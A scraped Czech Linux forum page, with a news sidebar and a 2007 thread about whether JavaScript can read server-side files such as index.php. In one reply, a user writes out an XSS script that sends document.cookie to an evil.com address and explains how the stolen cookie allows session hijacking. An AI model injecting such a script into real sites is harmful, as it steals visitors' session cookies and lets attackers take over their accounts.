abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 23:33 | Komunita

    Sovereign Tech Fund oznámil finanční podporu následujících open source projektů: Scala, SDCC, Let's Encrypt, Servo, chatmail, Drupal, Fedify, openprinting, PHP, Apache Arrow, OpenSSL, R Project, Open Web Docs, conda, systemd a phpseclib.

    Ladislav Hagara | Komentářů: 0
    včera 13:11 | Nová verze

    Bylo vydáno OpenBSD 7.8. S předběžnou podporou Raspberry Pi 5. Opět bez písničky.

    Ladislav Hagara | Komentářů: 0
    včera 05:44 | Nová verze Ladislav Hagara | Komentářů: 2
    včera 05:22 | Bezpečnostní upozornění

    Byly publikovány informace o kritické zranitelnosti v knihovně pro Rust async-tar a jejích forcích tokio-tar, krata-tokio-tar a astral-tokio-tar. Jedná se o zranitelnost CVE-2025-62518 s CVSS 8.1. Nálezci je pojmenovali TARmageddon.

    Ladislav Hagara | Komentářů: 3
    21.10. 23:15 | Nová verze

    AlmaLinux přinese s verzí 10.1 podporu btrfs. XFS bude stále jako výchozí filesystém, ale instalátor nabídne i btrfs. Více informací naleznete v oficiálním oznámení.

    Max | Komentářů: 2
    21.10. 22:33 | IT novinky

    Společnost OpenAI představila svůj vlastní webový prohlížeč ChatGPT Atlas. Zatím je k dispozici pouze na macOS.

    Ladislav Hagara | Komentářů: 0
    21.10. 14:33 | Nová verze

    Desktopové prostředí KDE Plasma bylo vydáno ve verzi 6.5 (Mastodon). Přehled novinek i s videi a se snímky obrazovek v oficiálním oznámení. Podrobný přehled v seznamu změn.

    Ladislav Hagara | Komentářů: 3
    21.10. 13:55 | IT novinky

    Rodina jednodeskových počítačů Orange Pi se rozrostla (𝕏) o Orange Pi 6 Plus.

    Ladislav Hagara | Komentářů: 10
    21.10. 13:33 | IT novinky

    Na Humble Bundle běží akce Humble Tech Book Bundle: All Things Raspberry Pi by Raspberry Pi Press. Se slevou lze koupit elektronické knihy od nakladatelství Raspberry Pi Press a podpořit Raspberry Pi Press, Raspberry Pi Foundation North America nebo Humble.

    Ladislav Hagara | Komentářů: 0
    21.10. 11:44 | Humor

    Přidaný režim autonomního řízení vozidel Tesla Mad Max je dostupný pro vybrané zákazníky v programu EAP (Early Access Program). Nový režim je na silnici agresivnější, častěji mění pruhy a ne vždy dodržuje rychlostní limity. Agentura JPP spekuluje, že v Česku by se mohl nový režim namísto Mad Max jmenovat Mad Turek...

    karkar | Komentářů: 24
    Jaké řešení používáte k vývoji / práci?
     (36%)
     (48%)
     (20%)
     (20%)
     (22%)
     (18%)
     (21%)
     (18%)
     (18%)
    Celkem 256 hlasů
     Komentářů: 14, poslední 14.10. 09:04
    Rozcestník
    Štítky: není přiřazen žádný štítek

    .

    28.12.2007 01:18 | asdgf | poslední úprava: 26.11.2009 20:42

    .        

    Hodnocení: 14 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    progdan avatar 28.12.2007 01:40 progdan | skóre: 34 | blog: Archař | Teplice/Brno
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Nejsem si zcela jisty, ale k souborum myslim JavaScript do urcite miry pristupovat dokaze. Cim sem si vsak jisty, nedokaze pristoupit k souboru php. Tedy dokaze, ale ziska pouze koncovy (X)HTML (nebo jiny) vystup, nikdy vsak samotny kod souboru - to nelze zadnym zpusobem ani jazykem (krome prolomeni hesla na FTP a stazeni souboru ale to uz je neco trochu jinyho)
    Collecting data is only the first step toward wisdom, but sharing data is the first step toward the community.
    unknown_ avatar 28.12.2007 01:43 unknown_ | skóre: 30 | blog: blog
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Dík, myslel sem, že pokud k tomu dokáže přistoupit, tak jako k plain textu, protože html výstup už mám :-)
    unknown_ avatar 28.12.2007 01:45 unknown_ | skóre: 30 | blog: blog
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    K tomu přístupu k .php, mělo by to jít pomocí php funkce readfile()?
    Josef Kufner avatar 28.12.2007 01:54 Josef Kufner | skóre: 70
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    K souborům by jsi se neměl dostat ani na straně klienta a už vůbec ne na straně serveru. Pokud se ti to povede, tak to nahlaš jako obrovskou bezpečnostní díru.
    Hello world ! Segmentation fault (core dumped)
    unknown_ avatar 28.12.2007 01:59 unknown_ | skóre: 30 | blog: blog
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    To se mi nepovede už proto, že se tím asi dál zabývat nebudu, jen sem se trochu nudil, takže je mi to docela jedno. Jenom škoda, mohl z toho být poprask. Ale na to XSS je náchylnej snad každej druhej server :-/
    Přemek Vyhnal avatar 28.12.2007 01:59 Přemek Vyhnal | skóre: 24 | blog: Toto není blog! | Dobřichovice
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Můžu pomocí javascriptu zobrazit index.php?
    Javascript běží u klienta - v prohlížeči.

    Ale kdyz ho dokazes vlozit do nejaky stranky tak aby se zobrazil i jinym navstevnikum tak muzes napriklad ukrast prihlasovaci susenku.
    <script>
    location.href="http://evil.com/sendtomail.php?cookie="+document.cookie; 
    </script>
    
    Tohle presmeruje navstevnika na utocnikuv server na script kterej parametry co dostane pres GET posle na mail (treba). Utocnik si pak to co mu prijde nastavi jako svoji susenku a rychle nez se obet odhlasi se pujde s tou susenkou podivat na ten web a bude prihlasenej jako uzivatel kterymu to ukrad.

    ..ale je to lamarna .)

    BTW jde to i na abclinuxu
    NO RAPTORS!
    28.12.2007 10:37 Ritchie | skóre: 27 | blog: Ritchie's | Berlin
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Samozřejmě, že lze pomocí javascriptu otevřít soubor, stačí vytvořit objekt File. Ovšem ne všechny implementace javascriptu povolují vytvořit takový objekt, například implementace javascriptu v prohlížečích z pochopitelných důvodů soubory otevírat neumožňují.

    Nemusím snad psát, že abyste mohl otevřít soubor, musíte mít přístup k souborovému systému, kde se soubor nachází. Pokud máte představu, že HTTP zpřístupňuje souborový systém serveru, doporučuji si přečíst alespoň úvod k tomuto protokolu. Zabralo by vám to jistě méně času, než napsání nesmyslného příspěvku do blogu.
    28.12.2007 11:51 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Btw neznáte nějaký přehled javascriptových funkcí? Nerad bych swe zdržoval věcma jako že a=1, b=2, a+b=3; to je ve všech jazycích stejný. Potřeboval bych nějaký přehled všech funkcí javascriptu. Nevíte o něčem takovým? … Co udělat na webu, hacknutelného přes XSS, když nemůžu nahradit index?
    Nechat ten hacknutelný web na pokoji, a jít studovat základy. Základy programování, základy HTML a souvisejících věcí, co je to JavaScript a co jsou různé jeho implementace. Pak taky můžete trénovat vyhledávání Googlem (to abyste se nemusel shánět po manuálech k JavaScriptu, když vám jich Google najde několik stránek). Až to všechno budete mít nastudované, zjistěte si taky, co je to XSS – doufám, že po prostudování všeho předešlého už nebudete zklamaný z toho, že XSS není to, co hledáte.
    28.12.2007 22:34 Mazarik
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Pokial Javascript chcete pouzit ako jazyk na serveri(nieco v style php), tak sa samozrejme subory otvarat daju. Pokial chcete pracovat so subormi na html stranke na strane klienta, tak to ide imho maximalne pomocou html input type="file" tusim, kde sa Vam otvori file dialog. Na ine operacie so subormi na strane klienta potrebujete vacsie prava, ktore musi povolit uzivatel. Aj ked som presne nepochopil o co Vam vlastne ide, tak pravdepodobne chcete presmerovat stranku pomocou javascriptu na inu stranku. Tak to sa robi napriklad document.location.href="_adresa_"
    28.12.2007 22:36 Mazarik
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Este celkom dobra a dokumentacia Javascriptu, ktora funguje vo vsetkych prehliadacoch, je na stranke http://devguru.com/technologies/javascript/home.asp

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.